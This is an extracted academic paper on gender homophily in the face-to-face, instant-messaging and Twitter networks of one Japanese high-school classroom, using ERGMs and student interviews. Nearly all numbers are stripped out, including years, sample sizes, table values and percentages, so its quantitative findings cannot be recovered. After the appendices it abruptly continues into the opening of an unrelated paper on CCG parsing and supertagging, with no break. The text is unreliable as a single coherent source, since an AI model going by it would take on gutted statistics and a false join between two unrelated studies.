clubs include brass bands, choruses, drama, computers, biology, and in-house magazine. unlike sports clubs, all culture clubs accept participants regardless of gender. furthermore, academic courses may also operate as foci. in many high schools, students can choose between literature or science courses when they are in the first or second grade. each academic course has a different curriculum, and students often take classes with students from other classrooms in the same academic course. this study hypothesizes that academic courses also operate as foci because students who share the same academic course spend more time together than those who do not. triadic closure network formation is not caused merely by the matching of nodal attributes, but also by network endogenous effects. sometimes, the network structure itself induces network tie formation. triadic closure is an important network endogenous mechanism and refers to the trend that friends of friends are more likely to become friends, regardless of shared attributes or foci. in the context of classroom segregation in america, goodreau et al. ( ) suggest that homophily and friends of friends must be distinguished from one another. to evaluate the degree of gender homophily, the effect of triadic closure should be controlled for; otherwise, the triadic closure mechanism could amplify the homophily effect (wimmer and lewis, ). exponential random graph models this study aims to reveal the gender homophily effect of each network layer. 
as i mentioned before, to estimate the effects of gender homophily, it is necessary to control for other network mechanisms such as foci or triadic closure (goodreau et al., ). therefore, i used exponential random graph models (ergms) (robins et al., ) to do so. normally, the ergm is formulated as follows:

\Pr(Y = y) = \frac{1}{\kappa} \exp\left( \sum_{k \in A} \theta_k z_k(y) \right)

the probability of obtaining the observed network can be regressed on various network statistics in an exponential form. Y is a random variable of a binary network whose size is the same as the observed network; y is the observed network itself; and \theta_k is the parameter corresponding to network configuration k. these parameters indicate the extent to which specific network configurations, such as matching of gender or triadic closure, contribute to the whole network formation. z_k(y) is the statistic for network configuration k. for example, if y contains four triangles, z_{\text{triangle}}(y) = 4. \kappa is the normalizing coefficient, in other words, the sum of \exp\left(\sum_{k \in A} \theta_k z_k(y)\right) over all possible networks. A is the set of network configurations. since \kappa cannot realistically be calculated even for a small network, parameters are estimated by monte carlo maximum likelihood estimation (mc-mle) based on random graphs generated by mcmc. to evaluate homophily or foci effects, i used a 'nodematch' term, which is formulated below. the variable y_{ij} equals 1 if there is an edge between node i and node j and 0 otherwise; a_i and a_j are the attributes of nodes i and j. the term equals the count of edges whose nodal attributes are the same:

z_{\text{nodematch}}(y) = \sum_{i,j \,:\, a_i = a_j} y_{ij}

to examine the effects of triadic closure, i included the network statistic of geometrically weighted edge-wise shared partners (gwesp) as one of the independent variables. the gwesp statistic is formulated as follows:

z_{\text{gwesp}}(y) = e^{\alpha} \sum_{p=1}^{n-2} \left\{ 1 - \left(1 - e^{-\alpha}\right)^{p} \right\} \mathrm{ESP}_p(y)

where p is the number of shared partners of an edge and n is the number of nodes in the network y. \mathrm{ESP}_p(y) is the count of edges that have p edge-wise shared partners. if p = 1, \mathrm{ESP}_1(y) equals the number of edges that share only one partner. \alpha is the 'decay' parameter, which is included to avoid the degeneracy problem of the ergm (hunter, ). finally, the main research interest of this study is to compare the strength of homophily, that is, the gender nodematch parameter, among the various network layers. to evaluate the significance of the differences between network layers, i used confidence intervals (cis) of the estimated parameters. if the cis of the same parameter in two network layers do not overlap, it can be said that there is a statistically significant difference. qualitative research four months after the first questionnaire research, in october, i conducted semi-structured interviews based on the results of the aforementioned analysis to capture more information about students' communication media practices and the mechanisms of social network formation. i asked, for example, 'do gender or academic courses affect your social connections?', 'is there an opportunity to use im or snss in club activities or classes?', 'what kind of posts do you mainly make on sns (twitter)?', and 'how do you make friends on im and snss?' ethical considerations to handle the ethical problems of social network research, i complied with the guidelines given by borgatti and molina ( ).
in the context of the present research, there are two ethical problems to be overcome: anonymity and consent. first, regarding anonymity, a few social attributes are sufficient to identify individuals in small organizations (borgatti and molina, ). second, regarding consent, non-respondents can be named by other respondents regardless of their will (borgatti and molina, ). considering these problems, i performed the following three operations in the research. first, the node ids assigned to the dataset are not roster numbers but randomly generated numbers. this reduces the risk of personal identification when publishing research datasets. roster numbers are not perfectly anonymous because they are arranged in the japanese alphabetical order of students' last names, so there is a possibility of individual identification. to obtain anonymized node ids, roster numbers were converted into random numerical sequences that could be mapped onto roster numbers. after completing the research, i deleted the mapping table between the roster numbers and the node ids. second, in small social groups such as high school classes, individuals can be identified through combinations of social attributes, thus compromising anonymity. to address this, this article reports information on club activity only as the number of members or its category (sports or culture). third, i created a consent form asking whether respondents agreed to participate in the research. all students present signed this form; absent students did not answer it and were excluded from the study. results figure shows network graphs of face-to-face (f f), im (line), and sns (twitter) interactions in both waves. to make it easier to visually compare each layer, nodes in each network are arranged with the same coordinates, obtained by the fruchterman–reingold algorithm applied to the f f network of one of the waves. circle-shaped nodes indicate male students and triangle-shaped nodes indicate female students. [figure : network graphs.] table shows the descriptive statistics of the students. in both waves, the number of valid responses was ( males). the number of club activities to which students in this classroom belonged was , the -member clubs totaled , the -member clubs totaled , and the -member clubs totaled . here, 'n-member club' refers to clubs to which n student(s) in this classroom belong. since almost all students in this high school belonged to some club, it is possible that the overall number of members in each club, including students who were not in this class, was much higher than the values displayed here. as for the academic courses, the literature course included students, and the science course included students. for im, students used line, which is the most common instant messenger service in japan, but one student did not use any im services. regarding snss, students used snss and students did not. specifically, students had an account on twitter, students were on facebook, eight students were on instagram, eight students used google+, and three students used other snss (multiple answers were allowed). regarding the sns networks, in one wave's data three dyads interacted on instagram, and in the other wave's data it was not possible to determine on which sns five ties were formed; all other ties were interactions on twitter. in order to focus on a single sns mechanism, i excluded those ties from the analysis and examined the social network on twitter only.
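before turning to the network statistics, the short sketch below illustrates, under stated assumptions, the data-preparation steps described above: replacing roster numbers with random node ids and then discarding the mapping, symmetrizing the directed name-generator nominations into undirected ties, and computing the density and the e-i index used in the results below. it is not the study's actual code, and the input rows, attribute values, and id range are hypothetical.

import random

# hypothetical survey output: directed nominations (respondent roster number -> named alter)
nominations = [(3, 7), (7, 3), (3, 12), (12, 5), (5, 12)]
gender_by_roster = {3: "F", 5: "M", 7: "F", 12: "M"}

# step 1: anonymize roster numbers with random node ids, then drop the mapping table
rosters = sorted(gender_by_roster)
node_ids = random.sample(range(1000, 10000), len(rosters))
mapping = dict(zip(rosters, node_ids))
gender = {mapping[r]: g for r, g in gender_by_roster.items()}
directed_edges = [(mapping[a], mapping[b]) for a, b in nominations]
del mapping  # the roster-to-id table is not retained after coding

# step 2: symmetrize; a tie exists if at least one member of the dyad reported it
ties = {frozenset(edge) for edge in directed_edges}

# step 3: density and e-i index (el = inter-gender ties, il = intra-gender ties)
n = len(gender)
density = len(ties) / (n * (n - 1) / 2)
el = sum(1 for t in ties if len({gender[v] for v in t}) == 2)
il = len(ties) - el
ei_index = (el - il) / (el + il)
print(f"density = {density:.2f}, e-i index = {ei_index:+.2f}")

the same three steps apply unchanged to the f f, im, and sns layers, since each layer is recorded as its own set of nominations.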
in this study, both networks that contained all the nodes in the classroom and networks that contained only the nodes using the relevant services were considered. table shows the basic network statistics. the edge counts shown in the table are the numbers after the aforementioned manipulation. in parentheses, i report the statistics of the networks that contain only the nodes that used the services. note that isolated nodes in the online social networks may actively connect to users outside the classroom. network density is the observed tie count divided by all possible tie counts given the number of nodes, and it indicates the level of interaction activity within the network. this index was highest in the f f network compared to the im and sns networks, and the latter two were relatively similar across both waves. additionally, the average degree of all nodes, of only the male nodes, and of only the female nodes is shown for both waves. although in the f f and sns networks the average degree of male nodes is greater than that of female nodes, in the im network the average degree of female nodes is greater than that of male nodes. this may indicate that female students interact with other students by im more actively than male students, whereas male students are more active in the f f and sns networks. preliminarily, i compare the strength of gender segregation using the e-i index (krackhardt and stern, ). the e-i index is formulated as (el − il)/(el + il), where el is the number of external (inter-gender) links and il is the number of internal (intra-gender) links. the range of this index is −1 (all links are internal) to 1 (all links are external). in the wave 1 data, the index is lowest (most strongly gender-segregated) in the f f network, and the second lowest is the im network; in the sns network the index is still negative, but it is the highest of the three layers. in the wave 2 data, the index of the im network increased to almost the same level as that of the sns network, which means that the proportion of inter-gender ties in the im network increased over the three months.

[table : descriptive statistics of students, giving frequencies by gender (male/female), club activity (by number of members in the classroom), academic course (literature/science), im (line) registration, and sns registration (twitter, facebook, google+, instagram, other), with the total number of nodes.]

ergm in figure , the points show the coefficients of gender homophily, and the horizontal bars show the confidence intervals of the ergm for each network layer. in table , all the parameters are shown in tabular form. see appendix a for information on the goodness of fit. positive effects of gender homophily are observed in the f f network across both waves. below, i discuss the main findings for the hypotheses. first, in the sns network, no gender homophily effect could be observed, and the coefficients are lower than those of the f f networks. although, in one wave, the confidence interval of the sns network restricted to users overlapped slightly with that of the f f network in the same wave, the estimated coefficient is almost the same as that of the sns network with all students. this result suggests that, given the same node set, and even after controlling for other network formation mechanisms, gender homophily operated more weakly in the sns network layer than in the f f network layer, as hypothesized in hypothesis a.
second, whereas in the wave 1 data the coefficients of gender homophily in the im networks were positive and statistically significant, in the wave 2 data gender homophily in the im network layer could not be observed at all, as in the sns network. this result means that hypothesis b is only partially supported. on the one hand, the wave 1 results did not agree with the hypothesis; on the other hand, three months later in the wave 2 data, gender homophily was reduced to the same degree as that of the sns network and showed a significant difference from the f f network, as hypothesized in hypothesis b. third, although the estimated coefficients of the im network were more positive than those of the sns network in the wave 1 data, the difference was not statistically significant. moreover, as previously mentioned, gender homophily effects could not be observed at all in the wave 2 data, as in the sns network layer. this result indicates that the hypothesis that gender homophily operates more weakly in the sns layer than in the im layer is not supported. however, it is remarkable that at first im had a weak positive homophily effect that disappeared within three months. additionally, the foci effects of club activities were strong in every layer, and this mechanism was robust across the various network layers. this suggests that we cannot ignore real-world social institutions when considering the mechanisms of not only offline networks but also online networks. at the same time, the data showed no effect of academic courses on any network layer except f f. this means that students were not connected to each other online simply because they were in the same classes. these results were robust across waves.

[table : network statistics: node count, edge count, density, average degree (all, male, female), and e-i index for the f f, im, and sns networks in both waves; values in parentheses are for the networks restricted to service users.]

[figure : estimated coefficients of gender homophily by ergm (horizontal bars are confidence intervals).]

the triadic closure effect was observed in every network layer and in both waves. this means that all the networks tended toward triadic closure, even after controlling for nodal attributes such as gender. in other words, in these network layers, friends of friends were likely to be connected to each other. it is worth noting that in the wave 1 data, although the difference was not statistically significant, the sns network (and the sns network without non-users) was the most transitive network among all layers; however, this tendency toward triadic closure in the sns was weaker in wave 2. in appendix b, i discuss the difference in the strength of gender homophily separately for each gender. semi-structured interviews table summarizes the attributes of the interviewees in the semi-structured interviews. when selecting subjects, i tried not to bias the sample in terms of gender, academic course, affiliation to club activities, or media usage among the interviewees who were able to schedule interviews during the limited time period available. at the time of the interviews, in order to avoid student attrition, their narratives were not recorded electronically; i simply wrote them down in field notes during the interviews.
interviewees' narratives in this article were reconstructed from field notes, and names were alphabetized from a to g (see table ) to identify who said what in the quotes in the following discussion.

[table : all estimated coefficients of the ergms: edges, gender homophily, foci (academic course), foci (club activity), and gwesp, with standard errors, aic, bic, and log likelihood, for the f f, im, im (users only), sns, and sns (users only) networks in both waves. notes: the decay parameter of gwesp (alpha) is fixed separately for the f f, im, and sns layers; asterisks denote significance levels.]

practices on im (line) regarding interaction on im, belonging to the same club was recognized as one of the most important factors in forming a relationship. student d reported: 'i use line with people who belong to the same club activity.' students reported that im was mainly used as a tool for conveying information about club activities, as student d added: 'i mainly use it for business communication, not chatting. i often use im for club activities, but i am not an active user in this classroom.' as another example, student c said: 'in one-on-one communication, i just talk with people in the same group activity to discuss topics that are inconvenient to talk about in reality, such as deciding on a birthday gift for the teacher.' one-on-one im communication with classmates was also used for communication regarding classroom affairs. moreover, the 'arrangement of seats' and a 'common hobby', such as playing videogames, were key factors in cultivating relationships between students, which was not considered in the quantitative study. regarding the 'arrangement of seats,' student d said: 'i don't have many personal talks, but if any, i send a picture of the class board. i do not talk much, but i often talk to people in the same class who are seated close to me.' regarding the importance of a common hobby, student f said: 'when it comes to one-on-one communication, i often talk about videogames with people in my class on line.' this indicates that 'hobby homophily' also operates in the im network. however, how do students begin interacting on im? when it comes to friending, students are reluctant to register other students as friends without having experienced f f interaction. for example, student d said: 'i am not the type who adds friends myself. people i have not met in real life do not become my friends. i only accept a request if it is sent from another person.' she added: 'not many people interact with me through line alone; i do not register people as friends if i have never spoken to them.' there is a process through which f f communication takes place first, followed by friend registration, and then message exchanges on im.
this may be the reason why the homophily mechanisms of the f f network and of the im network in its early stage are relatively consistent, compared to the sns network. practices on snss (twitter) the results of the semi-structured interviews suggested that in the sns network, as in the im network, 'hobby' was the main topic of conversation, and if students had a common hobby, they were likely to follow each other even if they did not talk in reality. for example, student a said: 'some people talk about their hobbies on line with the same high school people they met on twitter. sometimes they meet on twitter and then talk on line.' as another example, student f reported: 'i often talk about my hobbies with people on twitter. if it is not a protected account, and if i think my hobbies are going to match, i think a person is safe, and even people who do not know me may follow me. some people have conversations about hobbies on twitter and then actually get along in real life.' after discussing their hobbies on twitter, students began talking on im or in real life, thus deepening their friendships. unlike im, students do not necessarily follow users on snss after meeting them in the real world. thus far, it has been revealed that, whereas following on sns networks did not necessarily require offline communication, the exchange of contacts through im often originated in face-to-face communication. therefore, it can be inferred that the network formation mechanisms in the im network are more consistent with the f f network than those in the sns network, at least in its early stage. the ergm results for the im network in wave 1 showed weak gender homophily effects, but no effects were shown in wave 2. this means that in wave 1, which was conducted about two months after the students were assigned to a new class, the im network was more consistent with the f f network than in wave 2; the effects of gender homophily vanished in wave 2. therefore, it can be assumed that social interactions in the im network became independent of the earlier f f network within three months.

table : information of sampled participants
name | gender | academic course | club activity | registered on im (line)? | registered on sns (twitter)?
a | female | science | culture | yes | yes
b | male | literature | culture | yes | no
c | male | science | culture | yes | no
d | female | literature | sports | yes | yes
e | male | science | sports | yes | no
f | male | science | culture | yes | yes
g | male | science | sports | yes | yes

furthermore, regarding snss, it was suggested that functions such as 'retweet' or 'recommended users' induce relationships between students in the classroom. student a said: 'although we have never actually spoken, sometimes a friend retweets another friend's tweet and i follow, knowing that the person is in the same class as me.' student g also said: 'users who belong to the same class are usually shown as "recommended users" on twitter. i do not necessarily follow after getting acquainted with them in reality.' if students cannot identify whom an account belongs to in the class, they ask someone they know. student d said: 'i sometimes ask my friends who a certain account belongs to. the recommendation function can tell you that you are in the same class.' as previously explained, on snss, 'belonging to the same classroom' becomes a shared group identity, and social ties may emerge regardless of gender, assisted by the functions built into the platform.
in the previous section, the ergm results showed that the effect of triadic closure on twitter was higher than that on the other network layers, which was likely caused by such technical factors. discussion and conclusion thus far, i have compared the strength of gender homophily among various media network layers. first, hypothesis a (in the sns social network layer, gender homophily operates more weakly than in the offline social network layer) was supported. even when the other networking mechanisms were controlled, the ergm showed no gender homophily mechanism in the snss, and there was a clear difference in the strength of homophily between the f f and sns networks: whereas the gender homophily mechanism operated strongly in the f f network, no such effect could be observed in the sns network. this difference was statistically significant, given the same node set as the f f network. hypothesis b (in the im social network layer, gender homophily operates more weakly than in the offline social network layer) was only partially supported. whereas the coefficients of gender homophily in the im networks were positive and statistically significant in the wave 1 data, no gender homophily was observed at all in the im network layer in the wave 2 data, as in the sns network. the qualitative research indicated that this was caused by differences in the process of friending between im and snss. whereas f f contact did not necessarily precede friending in the sns networks, the exchange of contacts on im often originated in f f communication. this can be interpreted as follows: since network formation in the im network layer required f f contact, the im network was consistent with the f f network in the early stages; however, communication on im became independent of f f communication, and the gender homophily effects also disappeared within three months. third, the hypothesis that in the sns social network layer gender homophily operates more weakly than in the im social network layer was not supported. however, it is remarkable that at first im had a weak homophily effect, which vanished within three months. these results show that, in multiplex-media networks, social networks on online media are more likely to be heterophilic than those in offline space, even though im had a weak but positive gender homophily effect at first. from the qualitative research, some practices and social contexts of communication media were identified that could explain the results of the quantitative analysis. table summarizes the difference between im and snss in terms of gender homophily and its formation process.

table : summarization of the gender homophily effects of the im and sns networks and their formation principles
media | gender homophily | formation principles
im | weak positive (wave 1); none (wave 2) | f f communication preceded friending; hobby homophily
sns | none (wave 1); none (wave 2) | f f communication did not necessarily precede following; 'retweet' or 'recommended users' induced social ties; hobby homophily

triggered by the characteristic functions on twitter such as 'retweeting' or 'recommended users,' once students identified a user as being 'in the same classroom' or as having a 'common hobby,' they connected with each other. the relative weakness of gender homophily in the online networks could be explained not only by the foci mechanism of 'classroom membership' but also by 'hobby homophily.' these factors canceled out the gender homophily effects.
these findings can also be explained in terms of 'multidimensional homophily' (block and grund, ). according to block and grund ( ), homophily effects on single dimensions can be strongly observed; however, an interaction effect of sex with some other dimension is less likely to occur. simply put, homophily is likely to occur on one dimension but not on two or more dimensions at once. from this perspective, the result implies that multidimensional matching on both cultural tastes and gender is less likely to occur. overall, this study implies that considering offline or online space alone may cause misunderstandings regarding homophily, because the observed strength of homophily effects depends on whether the space examined is offline or online. in addition, how heterogeneous online connections are depends on what kind of online media is investigated and on when the social network data are collected, as indicated by the finding that im is gender homophilous in the early stage of the classroom but becomes less homophilous three months later. this suggests that studies of homophily in an organization that are based on online connection data have to be careful about the characteristics and practical usages of the online media involved. more discussion is also needed about where the 'actual' homophily lies: is it in an online network, an offline network, or a network merging these networks together? regarding hypothesis a, no gender homophily effect was observed in either wave in the sns network, although the difference from the im network was not significant. this may indicate that, in the sns network, the group identity of being part of the 'same classroom' played a key role in network formation. f f communication did not necessarily precede friending on the sns. students encounter one another online through 'recommended users' or 'retweeting' on a platform that contains many strangers who are not members of their class. this feature of snss may enhance the situated group identity of being 'classmates' for students, which can lead connections on the sns to be more gender-heterogeneous even though the students might never have spoken in the offline classroom. however, this result also indicates that network formation on snss at least partially depends on the recommendation algorithms. therefore, the relative weakness of gender homophily on snss could be lost if there is a change in the architecture of the services. online social networks are important because they generate 'latent ties' (haythornthwaite, ), in which otherwise disconnected people are connected through electronic communication media. although it is impossible to predict whether these connections will become a 'real' social network, these latent ties connect dissimilar people. future research must trace social ties online and examine whether they emerge offline. limitations there are some limitations to the present study. first, since this study was a case study of a single high school classroom, connections that occurred outside of the class (e.g., within the whole school) could not be considered. in the future, it will be necessary to verify the hypotheses in a group that includes more social actors. second, in this study, only gender homophily was considered. however, it is necessary to examine how the strength of homophily offline and online differs along other social dimensions, such as age and political attitude. third, this study did not track real interactions in the online world. students were merely asked about their interactions via a questionnaire.
many students’ accounts on twitter were set to private. as a result, it was difficult to obtain matches between offline and online identities and agreements with respondents. students answered each question based on their memory and estimation of their behavior across these media. i did not observe how students actually replied to or commented on online posts or communicated f f. therefore, they may have provided inaccurate responses regarding the individuals with whom they connected in different settings. moreover, respondents may have felt shy and underreported their f f cross-gender relation ships if there was a norm that constrained cross-gender interactions in their classroom. fourth, the dataset used in this research lacked specification regarding the strength or type of social ties. this raises the question: are those ties strong or weak, and are they friendships or romantic rela- tionships? the latter difference is a unique point in gender homophily. in a survey of japanese high school students, . % of male students and . % of female students reported that they had dated before (takehara et al., ). therefore, gender homophily in multilayer media social networks cross-gender ties in this study could have included romantic partnerships. information on the nature of social ties would help reveal what types of norms are alleviated by online space. for instance, if these ties were friendships, it could be supposed that there is a norm that constrains cross-gender friendships in the classroom. future research should address this issue. finally, this study only targeted second-grade high school students. it is known that the effects of homophily change with age (shrum et al., ; laniado et al., ), and the difference between offline and online homophily can decrease or disappear. future studies should consider broadening the age range. acknowledgments this research received a grant from gushinkai foundation, - (representative: naoki maejima). references barlow, j. p. . declaration of independence for cyberspace, available at: https://www.eff.org/cyberspace- independence. baym, n. k. and ledbetter, a. . tunes that bind? predicting friendship strength in a music-based social network. information, communication & society : – . block, p. and grund, t. . multidimensional homophily in friendship networks. network science : – . booth, a. and hess, e. . cross-sex friendship. journal of marriage and the family : – . borgatti, s. p. and molina, j. . toward ethical guidelines for network research in organizations. social networks : – . boyd, d. m. . taken out of context: american teen sociality in networked publics. phd dissertation, university of california, berkeley, ca. boyd, d. m. and ellison, n. b. . social network sites: definition, history, and scholarship. journal of computer-mediated communication : – . colleoni, e., rozza, a. and arvidsson, a. . echo chamber or public sphere? predicting political orientation and measuring political homophily in twitter using big data. journal of communication : – . conover, m. d., ratkiewicz, j., francisco, m., gonçalves, b., menczer, f. and flammini, a. . “political polarization on twitter”, proceedings of the fifth international aaai conference on weblogs and social media, barcelona. domínguez, s. and hollstein, b. . mixed methods social networks research: design and applications. cambridge university press, new york, ny. ellison, n. b., steinfield, c. and lampe, c. . 
the benefits of facebook “friends”: social capital and college students’ use of online social network sites. journal of computer-mediated communication : – . feld, s. . the focused organization of social ties. american journal of sociology : – . feld, s. and grofman, b. . “homophily and the focused organization of ties”, in hedstrom, p. and bearman, p. (eds), the oxford handbook of analytical sociology. oxford university press, new york, ny, – . goodreau, s. m., kitts, j. a. and morris, m. . birds of a feather, or friend of a friend? using exponential random graph models to investigate adolescent social networks. demography : – . hallinan, m. t. and williams, r. a. . interracial friendship choices in secondary schools. american sociological review : – . haythornthwaite, c. . exploring multiplexity: social network structures in a computer-supported distance learning class. the information society : – . haythornthwaite, c. . social networks and internet connectivity effects. information, community & society : – . hristova, d., musolesi, m. and mascolo, c. . “keep your friends close and your facebook friends closer: a multiplex network approach to the analysis of offline and online social ties”, proceedings of the eighth international aaai conference on weblogs and social media, ann arbor, mi. hunter, d. r. . curved exponential family models for social networks. social networks : – . igarashi, t. . “longitudinal changes in face-to- face and text message-mediated friendship networks”, in lusher, d., koskinen, j. and robins, g. (eds), exponential random graph models for social networks: theory, methods and applications. cambridge university press, new york, ny, – . igarashi, t., takai, j. and yoshida, t. . gender differences in social network development via mobile phone text messages: a longitudinal study. journal of social and personal relationships : – . kalmijn, m. . sex segregation of friendship networks. individual and structural determinants of having cross-sex friends. european sociological review : – . kandel, d. b. . homophily, selection, and socialization in adolescent friendships. american journal of sociology : – . kendall, l. . hanging out in the virtual pub: masculinities and relationships online. university of california press, berkeley. connections kiesler, s., siegel, j. and mcguire, t. . social psychological aspects of computer-mediated communication. american psychologist : – . kivelä, m., arenas, a., barthelemy, m., gleeson, j. p., moreno, y. and porter, m. a. . multilayer networks. journal of complex networks : – . krackhardt, d. and stern, r. n. . informal networks and organizational crises: an experimental simulation. social psychology quarterly : – . laniado, d., volkovich, y., kappler, k. and kaltenbrunner, a. . “gender homophily in online dyadic and triadic relationships”, epj data science, . leszczensky, l. and pink, s. . ethnic segregation of friendship networks in school: testing a rational-choice argument of differences in ethnic homophily between classroom-and grade-level networks. social networks : – . mcpherson, m., smith-lovin, l. and cook, j. m. . birds of a feather: homophily in social networks. annual review of sociology : – . mehta, c. m. and strough, j. . sex segregation in friendships and normative contexts across the life span. developmental review : – . meyrowitz, j. . no sense of place: the impact of electronic media on social behavior. oxford university press, new york, ny. moody, j. . race, school integration, and friendship segregation in america. 
american journal of sociology : – . mouw, t. and entwisle, b. . residential segregation and interracial friendship in schools. american journal of sociology : – . omi, y. . “the potential of the globalization of education in japan: the japanese style of school sports activities (bukatsu)”, in marsico, g., dazzani, v., ristum, m. and de sousa bastos, a. c. (eds), educational contexts and borders through a cultural lens: looking inside, viewing outside, springer, new york, ny, – . parks, m. r. and floyd, k. . making friends in cyberspace. journal of communication : – . parks, m. r. and roberts, l. d. . making moosic’: the development of personal relationships on-line and a comparison to their off-line counterparts. journal of social and personal relationships : – . rheingold, h. . the virtual community: finding connection in a computerized world. addison-wesley longman publishing, boston, ma. robins, g. . doing social network research: network-based research design for social scientists. sage, london. robins, g., pattison, p., kalish, y. and lusher, d. . an introduction to exponential random graph (p*) models for social networks. social networks : – . shrum, w., cheek, n. h. and hunter, s. m. . friendship in school: gender and racial homophily. sociology of education : – . sproull, l. and kiesler, s. . reducing social context cues: electronic mail in organizational communication. management science : – . stehlé, j., charbonnier, f., picard, t., cattuto, c. and barrat, a. . gender homophily from spatial behavior in a primary school: a sociometric study. social networks : – . takehara, k., misago, c. and honda, y. . sexual behavior and sex education needs among high school students. japanese journal of health and human ecology : – . teddlie, c. and tashakkori, a. . a general typology of research designs featuring mixed methods. research in the schools : – . thelwall, m. . homophily in myspace. journal of the american society for information science and technology : – . walther, j. b. . interpersonal effects in computer-mediated interaction: a relational pers- pective. communication research : – . walther, j. b. . computer-mediated commu- nication: impersonal, interpersonal, and hyperpersonal interaction. communication research : – . wimmer, a. and lewis, k. . beyond and below racial homophily: erg models of a friendship network documented on facebook. american journal of sociology : – . appendix a to evaluate the goodness of fit of the ergms, i randomly generated networks from the estimated models and examined whether the model could replicate the observed network features. in figures a (wave ) and a (wave ), i used the following three commonly used structural features: degree distribution, geodesic distance, and edge-wise shared partners. red lines show the frequency of the observed network, whereas the boxplot shows the distribution frequency of the simulated networks. although almost all of the statistics are well replicated, in both waves, the degree distribution of the f f network and distributions of edge-wise shared partners in the f f and sns network are not replicated very well. the simulated distributions are skewed to the right, compared to the observed network. gender homophily in multilayer media social networks figure a : goodness of fit of ergm, comparing structural network statistics (wave ). however, the main interest of the present study is cross-gender connections. in figure a , comparisons of the e-i index between the observed network and the simulated networks are shown. 
red dots show the value of the observed network, whereas the box plots show the distribution of the values of the simulated networks. figure a : goodness of fit of ergm, comparing structural network statistics (wave ). as shown in figure a , the e-i index of the observed network falls around the median value of the simulated networks in every layer and wave, which means that the models replicate the mixing of gender in the classroom very well. figure a : goodness of fit of ergm, comparing e-i index (wave and ). appendix b i also estimated homophily parameters separately for each gender by ergms. the results are shown in figure b . here, the network statistic for (fe)male–(fe)male ties is defined as the number of edges in which both members of the dyad are (fe)males. in this model, the strength of gender homophily is allowed to differ by gender. independent variables other than gender homophily are the same as those in the manuscript; however, they are not shown. although the estimated coefficients are not significantly different between males and females, some patterns emerge from their estimated values. first, in both waves, female–female ties are less likely to form than male–male ties in the sns layer. second, female–female ties in the im layer become less homophilous in the wave data. third, in the wave data, male–male homophily became weaker in the f f layer, whereas female–female homophily remains as strong as in the wave data. figure b : gender homophily parameters estimated separately for male and female by ergm (horizontal bars are % cis). improved ccg parsing with semi-supervised supertagging mike lewis school of informatics university of edinburgh edinburgh, eh ab, uk mike.lewis@ed.ac.uk mark steedman school of informatics university of edinburgh edinburgh, eh ab, uk steedman@inf.ed.ac.uk abstract current supervised parsers are limited by the size of their labelled training data, making improving them with unlabelled data an important goal. we show how a state-of-the-art ccg parser can be enhanced, by predicting lexical categories using unsupervised vector-space embeddings of words. the use of word embeddings enables our model to better generalize from the labelled data, and allows us to accurately assign lexical categories without depending on a pos-tagger. our approach leads to substantial improvements in dependency parsing results over the standard supervised ccg parser when evaluated on wall street journal ( . %), wikipedia ( . %) and biomedical ( . %) text. we compare the performance of two recently proposed approaches for classification using a wide variety of word embeddings. we also give a detailed error analysis demonstrating where using embeddings outperforms traditional feature sets, and showing how including pos features can decrease accuracy. introduction combinatory categorial grammar (ccg) is widely used in natural language semantics (bos, ; kwiatkowski et al., ; krishnamurthy and mitchell, ; lewis and steedman, a; lewis and steedman, b; kwiatkowski et al., ), largely because of its direct linkage of syntax and semantics. however, this connection means that performance on semantic applications is highly dependent on the quality of the syntactic parse. although ccg parsers perform at state-of-the-art levels (rimell et al., ; nivre et al., ), full-sentence accuracy is just .
% on wikipedia text, which gives a low upper bound on logical inference approaches to question-answering and textual entail- ment. supertags are rich lexical categories that go be- yond pos tags by encoding information about predicate-argument structure. supertagging is “al- most parsing”, and is used by parsers based on strongly lexicalized formalisms such as ccg and tag to improve accuracy and efficiency, by dele- gating many of the parsing decisions to finite-state models (bangalore and joshi, ). a disadvan- tage of this approach is that larger sets of lexical categories mean increased sparsity, decreasing tag- ging accuracy. as large amounts of labelled data are unlikely to be made available, recent work has ex- plored using unlabelled data to improve parser lex- icons (thomforde and steedman, ; deoskar et al., ; deoskar et al., ). however, existing work has failed to improve the overall accuracy of state-of-the-art supervised parsers in-domain. another strand of recent work has explored us- ing unsupervised word embeddings as features in supervised models (turian et al., ; collobert et al., b), largely motivated as a simpler and more general alternative to standard feature sets. we apply similar techniques to ccg supertagging, hypothe- sising that words which are close in the embedding space will have similar supertags. most existing work has focused on flat tagging tasks, and has not produced state-of-the-art results on structured pre- diction tasks like parsing (collobert, ; andreas and klein, ). ccg’s lexicalized nature provides a simple and elegant solution to treating parsing as a flat tagging task, as the lexical categories encode information about hierarchical structure. transactions of the association for computational linguistics, ( ) – . action editor: ryan mcdonald. submitted / ; revised / ; published / . c© association for computational linguistics. as well as improving parsing accuracy, our model has a number of advantages over current ccg pars- ing work. our supertagger does not make use of a pos-tagger, a fact which simplifies the model archi- tecture, reduces the number of parameters, and elim- inates errors caused by a pipeline approach. also, learning word embeddings is an active area of re- search, and future developments may directly lead to better parsing accuracy, with no change required to our model. background . ccg parsing the widely-used c&c parser (clark and curran, ) for ccg takes a pipeline approach, where first sentences are pos-tagged, then supertagged, and then parsed. the supertagger outputs a distri- bution over tags for each word, and a beam is used to aggressively prune supertags to reduce the parser search space. if the parser is unable to find a parse with a given set of supertags, the beam is relaxed. this approach is known as adaptive supertagging. the pipeline approach has two major drawbacks. firstly, the use of a pos-tagger can overly prune the search space for the supertagger. whilst pos- taggers have an accuracy of around % in domain, this drops to just . % on biomedical text (rimell and clark, ), meaning that most sentences will contain an erroneous pos-tag. the supertag- ger model is overly dependent on pos-features—in section . we show that supertagger performance drops dramatically on words which have been as- signed an incorrect pos-tag. secondly, both the pos-tagger and supertagger are highly reliant on lexical features, meaning that performance drops both on unknown words, and words used differently from the training data. 
